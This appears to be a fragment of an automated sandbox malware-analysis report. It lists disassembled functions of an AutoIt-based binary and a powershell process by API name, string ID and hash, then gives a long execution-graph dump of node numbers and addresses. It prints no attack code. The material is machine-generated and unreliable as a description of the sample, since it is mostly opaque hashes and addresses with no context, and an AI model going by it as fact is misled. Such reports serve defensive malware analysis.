                                                                                          • Instruction ID: 341e01ea82e861e19ce9190e3e4aaf3dd6441e9fa14d1f31db155882a6e02b87
                                                                                          • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                          • Instruction Fuzzy Hash: B431AF36A0C652C1EB18FB26E8582BDA760FB54F94F858531DE9E433A1EF7CD5468310
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _snwprintf
                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                          • API String ID: 3988819677-2584243854
                                                                                          • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                          • Instruction ID: 20375243a606b236fe7a81ef1bceeab5fb09639a6aa8fa5563d1aff54cf3a0f8
                                                                                          • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                          • Instruction Fuzzy Hash: 9B317B72B0CA02D6EB14FB65E4512ECA361FB44B84F914132DE8D17B69EF78E40AC760
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSendStock
                                                                                          • String ID: $SysTabControl32
                                                                                          • API String ID: 2080134422-3143400907
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID: @
                                                                                          • API String ID: 3000768030-2766056989
                                                                                          Similarity
                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 1983116058-2160076837
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 1025951953-2096851135
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: "$pow
                                                                                          • API String ID: 1757819995-713443511
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          Similarity
                                                                                          • API ID: Internet$OpenOption
                                                                                          • String ID: <local>
                                                                                          • API String ID: 942729171-4266983199
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess
                                                                                          • String ID:
                                                                                          • API String ID: 3712363035-3916222277
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 3678867486-1403004172
                                                                                          • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                          • Instruction ID: ecfa4ae48aa3f01cff2fe905037c93b332ade719fbce659a85fe046b5fa25051
                                                                                          • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                          • Instruction Fuzzy Hash: 24016521A5C586D2EA20F714E1A11BD9361EF95384FD04231E9DD07AAEFE6CD609CB20
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$tan
                                                                                          • API String ID: 3384550415-2428968949
                                                                                          • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                          • Instruction ID: 54200abe7d3ff87ada2443cc0bfaca4e4fb7b2a394f774a28d73e724c9ec7aea
                                                                                          • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                          • Instruction Fuzzy Hash: CA018471A2CB85C1DA14EF12A44037AA6A2BFDA7D4F505335EA9E0BB94EF7DD1508B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$cos
                                                                                          • API String ID: 3384550415-1949035351
                                                                                          • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                          • Instruction ID: 3eba9b8f6767674c25d4ef16e01161cba77bffdde98d393e0d326aed419d95b7
                                                                                          • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                          • Instruction Fuzzy Hash: D5019271A2CB89C1D614EE22944037AA6A2BF9A7D4F505325E99E0BBD4EB6DD0505B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                          • String ID: !$sin
                                                                                          • API String ID: 3384550415-1565623160
                                                                                          • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                          • Instruction ID: 3ea1e9a092c4c4410a315a77976319243e6a0a71f9e226a70bbc20482739cae8
                                                                                          • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                          • Instruction Fuzzy Hash: E5019272A2CB85C1D614EF22944037AA6A2BF9A7D4F505325E99E0BBD4EF6DD0404B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: "$exp
                                                                                          • API String ID: 1757819995-2878093337
                                                                                          • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                          • Instruction ID: aaa0ef404df365a3d6ef5782ab4eebe95ae3990475e281eea70393efe0e2f457
                                                                                          • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                          • Instruction Fuzzy Hash: 8801A976A2CA88C2E220DF24D4452AAB6B0FFDA344F601315E7841A670D77DD4819B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 2030045667-4017498283
                                                                                          • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                          • Instruction ID: fcd5f6e5737f459ea174345dc4ea05dc9a27957370ffd73d6c90f3f7310d659f
                                                                                          • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                          • Instruction Fuzzy Hash: A9F0A020B1C64AC2EB18B355B1553B9A252AF88780FD45431D98D47BAAEDACD4818760
                                                                                          APIs
                                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF74D0575E9
                                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF74D057241,?,?,?,?,00007FF74D05660C,?,?,?,?,00007FF74D054CD3), ref: 00007FF74D057600
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Valuetry_get_function
                                                                                          • String ID: FlsSetValue
                                                                                          • API String ID: 738293619-3750699315
                                                                                          • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                          • Instruction ID: 5f41145a7bbe273ce37ede95a3b9e8487e516015145ccc7392df46cd0e21fb8d
                                                                                          • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                          • Instruction Fuzzy Hash: 4EE06D62A0C646C1EB09BB55F4144F8A361AF8CB91FD94036DA9D073B5EE7CE988C760
                                                                                          APIs
                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74D055629
                                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF74D05563A
                                                                                            • Part of subcall function 00007FF74D057018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D05563F), ref: 00007FF74D05708D
                                                                                            • Part of subcall function 00007FF74D057018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74D05563F), ref: 00007FF74D0570BF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                          • String ID: Unknown exception
                                                                                          • API String ID: 3561508498-410509341
                                                                                          • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                          • Instruction ID: 51af5b1954191b594d97ac6f2a3a200a4c994ee524dfbeee6d2a2c93cd239f09
                                                                                          • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                          • Instruction Fuzzy Hash: 55D05B22A1C546D1DE10FB04D854398E330F784304FD04431D58D435B1FF2CD64AD710
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2036069237.00007FFAAB1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab1b0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b0619e9a079aab073799a85a947dca4c13f944a315a8e6f85ee7f30824b9e39
                                                                                          • Instruction ID: 7a5d5da26b7c97cb42ea476932a989d9474e2b9cf1289cb643b5d475e5577ce2
                                                                                          • Opcode Fuzzy Hash: 8b0619e9a079aab073799a85a947dca4c13f944a315a8e6f85ee7f30824b9e39
                                                                                          • Instruction Fuzzy Hash: 05611E53A1FE86CFF79A977C48552B5A6C2EF8629475885BED04EC31E3DD08DC098381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2036069237.00007FFAAB1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab1b0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ef0d64c0fbf99c53e99af85bb11acf84c98cb3d18776ae2a7e919b44d35b1982
                                                                                          • Instruction ID: 7ed6ce1d6019c790b4a5f4a5a09309e132d77573a7352cae2299690a4062466d
                                                                                          • Opcode Fuzzy Hash: ef0d64c0fbf99c53e99af85bb11acf84c98cb3d18776ae2a7e919b44d35b1982
                                                                                          • Instruction Fuzzy Hash: D541E693A1FA87CFE39A5378486927865C2EF86299758C4B9D44EC31E2DD1CAC094381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                          • Instruction ID: b58b18e598536083be5dec6ecc9c5fb48ee31a40dc7e52434904c69ea96cb0db
                                                                                          • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                          • Instruction Fuzzy Hash: 9101677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3661DB36E892CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (0$8,$P/$^$/
                                                                                          • API String ID: 0-804865107
                                                                                          • Opcode ID: 98a7cc4ce7cb4f85eeaa41e3eabf15ae501ed0fc8d946443368ee46f58483401
                                                                                          • Instruction ID: 94bf0c4edadf0afb20477c805a887d4e6a7daf8bb2c0e16f19bd316fe709c964
                                                                                          • Opcode Fuzzy Hash: 98a7cc4ce7cb4f85eeaa41e3eabf15ae501ed0fc8d946443368ee46f58483401
                                                                                          • Instruction Fuzzy Hash: 9721964290F6C14FF32597A87C1A2555F91DB93390B0884FFD0C80A4EBAA099D5983D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000013.00000002.2034959309.00007FFAAB0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_19_2_7ffaab0e0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @J$^$p@!$x.
                                                                                          • API String ID: 0-3683105300
                                                                                          • Opcode ID: 226b7df1e7c897c1f65d4339ec86ee6bc181bcccf57af86c70b51d4f29cc0849
                                                                                          • Instruction ID: 666db61f45606b98776d64121b37d1fb9190c20344b9f338cff1ef2346e85ea6
                                                                                          • Opcode Fuzzy Hash: 226b7df1e7c897c1f65d4339ec86ee6bc181bcccf57af86c70b51d4f29cc0849
                                                                                          • Instruction Fuzzy Hash: 3761B2C390FBC14BE36647A87C061786E94FBA2790B5880FBE0CC4A5EBB9559D1D43C5

                                                                                          Execution Graph

                                                                                          Execution Coverage:3.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:89
99273->99279 99291 a76333 99274->99291 99276->99273 99281 a40238 99277->99281 99283 a31c9c 59 API calls 99277->99283 99278->99269 99280 a7635f 99278->99280 99289 a762dd 99278->99289 99279->99277 99280->99269 99285 a7634a 99280->99285 99284 a31c9c 59 API calls 99281->99284 99293 a4023f Mailbox 99281->99293 99282 a31462 59 API calls 99282->99265 99283->99281 99284->99293 99288 a31821 59 API calls 99285->99288 99286 a7633b 99287 a31821 59 API calls 99286->99287 99287->99291 99288->99291 99289->99286 99294 a76326 99289->99294 99290 a31609 59 API calls 99290->99291 99291->99265 99291->99290 99322 a3153b 59 API calls 2 library calls 99291->99322 99293->99222 99295 a31821 59 API calls 99294->99295 99295->99291 99297 a40291 GetFullPathNameW 99296->99297 99297->99236 99297->99237 99299 a3134b 99298->99299 99300 a31981 59 API calls 99299->99300 99301 a3135b 99300->99301 99301->99243 99303 a319fb 99302->99303 99304 a319ee 99302->99304 99305 a40fe6 Mailbox 59 API calls 99303->99305 99304->99240 99305->99304 99307 a31471 99306->99307 99308 a314ce 99306->99308 99307->99308 99310 a3147c 99307->99310 99309 a31981 59 API calls 99308->99309 99315 a3149f _memmove 99309->99315 99311 a31497 99310->99311 99312 a6f1de 99310->99312 99314 a31b7c 59 API calls 99311->99314 99313 a31c7e 59 API calls 99312->99313 99316 a6f1e8 99313->99316 99314->99315 99315->99272 99317 a40fe6 Mailbox 59 API calls 99316->99317 99318 a6f208 99317->99318 99320 a31aa4 59 API calls 99319->99320 99321 a31614 99320->99321 99321->99265 99321->99282 99322->99291 99324 a40fe6 Mailbox 59 API calls 99323->99324 99325 a25285 99324->99325 99326 a25294 99325->99326 99327 a31a36 59 API calls 99325->99327 99326->98884 99327->99326 99329 a431ae 99328->99329 99330 a43139 99328->99330 99348 a431c0 60 API calls 3 library calls 99329->99348 99333 a4315e 99330->99333 99346 a48d58 58 API calls __getptd_noexit 99330->99346 99332 a431bb 99332->98894 99333->98894 99335 a43145 99347 a48fe6 9 API calls __cftof2_l 99335->99347 99337 
a43150 99337->98894 99338->98894 99339->98894 99341 a24f87 99340->99341 99342 a24f48 99340->99342 99343 a31c9c 59 API calls 99341->99343 99344 a40fe6 Mailbox 59 API calls 99342->99344 99345 a24f5b 99343->99345 99344->99345 99345->98894 99346->99335 99347->99337 99348->99332 99350 a24d37 84 API calls 99349->99350 99351 a9d203 99350->99351 99366 a9d24a Mailbox 99351->99366 99387 a9de8e 99351->99387 99353 a9d617 99437 a9dfb1 92 API calls Mailbox 99353->99437 99356 a9d626 99357 a9d4b0 99356->99357 99359 a9d632 99356->99359 99400 a9d057 99357->99400 99358 a24d37 84 API calls 99365 a9d29b Mailbox 99358->99365 99359->99366 99364 a9d4e9 99415 a40e38 99364->99415 99365->99358 99365->99366 99374 a9d4a2 99365->99374 99419 a8fc0d 59 API calls 2 library calls 99365->99419 99420 a9d6c8 61 API calls 2 library calls 99365->99420 99366->98901 99369 a9d51c 99422 a247be 99369->99422 99370 a9d503 99421 a8a48d 89 API calls 4 library calls 99370->99421 99373 a9d50e GetCurrentProcess TerminateProcess 99373->99369 99374->99353 99374->99357 99379 a9d68d 99379->99366 99383 a9d6a1 FreeLibrary 99379->99383 99380 a9d554 99434 a9dd32 107 API calls _free 99380->99434 99383->99366 99386 a9d565 99386->99379 99435 a24230 59 API calls Mailbox 99386->99435 99436 a2523c 59 API calls 99386->99436 99438 a9dd32 107 API calls _free 99386->99438 99388 a31aa4 59 API calls 99387->99388 99389 a9dea9 CharLowerBuffW 99388->99389 99439 a7f903 99389->99439 99393 a31207 59 API calls 99394 a9dee2 99393->99394 99396 a31462 59 API calls 99394->99396 99395 a9df41 Mailbox 99395->99365 99397 a9def9 99396->99397 99398 a31981 59 API calls 99397->99398 99399 a9df05 Mailbox 99398->99399 99399->99395 99446 a9d6c8 61 API calls 2 library calls 99399->99446 99401 a9d0c7 99400->99401 99402 a9d072 99400->99402 99406 a9e139 99401->99406 99403 a40fe6 Mailbox 59 API calls 99402->99403 99405 a9d094 99403->99405 99404 a40fe6 Mailbox 59 API calls 99404->99405 99405->99401 99405->99404 99407 a9e362 Mailbox 99406->99407 99408 a9e15c 
_strcat _wcscpy __NMSG_WRITE 99406->99408 99407->99364 99408->99407 99409 a250d5 59 API calls 99408->99409 99410 a2502b 59 API calls 99408->99410 99411 a25087 59 API calls 99408->99411 99412 a24d37 84 API calls 99408->99412 99413 a4593c 58 API calls __malloc_crt 99408->99413 99449 a85e42 61 API calls 2 library calls 99408->99449 99409->99408 99410->99408 99411->99408 99412->99408 99413->99408 99417 a40e4d 99415->99417 99416 a40ee5 CreateToolhelp32Snapshot 99418 a40eb3 99416->99418 99417->99416 99417->99418 99418->99369 99418->99370 99419->99365 99420->99365 99421->99373 99423 a247c6 99422->99423 99424 a40fe6 Mailbox 59 API calls 99423->99424 99425 a247d4 99424->99425 99427 a247e0 99425->99427 99450 a246ec 59 API calls Mailbox 99425->99450 99428 a24540 99427->99428 99451 a24650 99428->99451 99430 a40fe6 Mailbox 59 API calls 99432 a245eb 99430->99432 99431 a2454f 99431->99430 99431->99432 99432->99386 99433 a24230 59 API calls Mailbox 99432->99433 99433->99380 99434->99386 99435->99386 99436->99386 99437->99356 99438->99386 99441 a7f92e __NMSG_WRITE 99439->99441 99440 a7f96d 99440->99393 99440->99399 99441->99440 99442 a7fa14 99441->99442 99443 a7f963 99441->99443 99442->99440 99448 a314db 61 API calls 99442->99448 99443->99440 99447 a314db 61 API calls 99443->99447 99446->99395 99447->99443 99448->99442 99449->99408 99450->99427 99452 a24659 Mailbox 99451->99452 99453 a5d6ec 99452->99453 99458 a24663 99452->99458 99454 a40fe6 Mailbox 59 API calls 99453->99454 99456 a5d6f8 99454->99456 99455 a2466a 99455->99431 99457 a25190 Mailbox 59 API calls 99457->99458 99458->99455 99458->99457 99459->98917 99460->98913 99462 a84d09 99461->99462 99463 a84cf0 99461->99463 99469 a437c3 59 API calls __wcstoi64 99462->99469 99463->99462 99466 a84d0f 99463->99466 99468 a4385c GetStringTypeW _iswctype 99463->99468 99466->98948 99467->98948 99468->99463 99469->99466 99470->98754 99471->98788 99472->98788 99473->98781 99474->98780 99475->98793 99476->98780 99477->98780 99478->98797 
99479 a47e83 99480 a47e8f __alloc_osfhnd 99479->99480 99516 a4a038 GetStartupInfoW 99480->99516 99482 a47e94 99518 a48dac GetProcessHeap 99482->99518 99484 a47eec 99485 a47ef7 99484->99485 99601 a47fd3 58 API calls 3 library calls 99484->99601 99519 a49d16 99485->99519 99488 a47efd 99489 a47f08 __RTC_Initialize 99488->99489 99602 a47fd3 58 API calls 3 library calls 99488->99602 99540 a4d802 99489->99540 99492 a47f17 99493 a47f23 GetCommandLineW 99492->99493 99603 a47fd3 58 API calls 3 library calls 99492->99603 99559 a55153 GetEnvironmentStringsW 99493->99559 99496 a47f22 99496->99493 99499 a47f3d 99500 a47f48 99499->99500 99604 a432e5 58 API calls 3 library calls 99499->99604 99569 a54f88 99500->99569 99503 a47f4e 99504 a47f59 99503->99504 99605 a432e5 58 API calls 3 library calls 99503->99605 99583 a4331f 99504->99583 99507 a47f61 99508 a47f6c __wwincmdln 99507->99508 99606 a432e5 58 API calls 3 library calls 99507->99606 99589 a35f8b 99508->99589 99511 a47f80 99512 a47f8f 99511->99512 99607 a43588 58 API calls _doexit 99511->99607 99608 a43310 58 API calls _doexit 99512->99608 99515 a47f94 __alloc_osfhnd 99517 a4a04e 99516->99517 99517->99482 99518->99484 99609 a433b7 36 API calls 2 library calls 99519->99609 99521 a49d1b 99610 a49f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99521->99610 99523 a49d20 99524 a49d24 99523->99524 99612 a49fba TlsAlloc 99523->99612 99611 a49d8c 61 API calls 2 library calls 99524->99611 99527 a49d36 99527->99524 99529 a49d41 99527->99529 99528 a49d29 99528->99488 99613 a48a05 99529->99613 99532 a49d83 99621 a49d8c 61 API calls 2 library calls 99532->99621 99535 a49d62 99535->99532 99537 a49d68 99535->99537 99536 a49d88 99536->99488 99620 a49c63 58 API calls 4 library calls 99537->99620 99539 a49d70 GetCurrentThreadId 99539->99488 99541 a4d80e __alloc_osfhnd 99540->99541 99542 a49e3b __lock 58 API calls 99541->99542 99543 a4d815 99542->99543 99544 a48a05 __calloc_crt 58 API calls 99543->99544 99545 a4d826 99544->99545 99546 
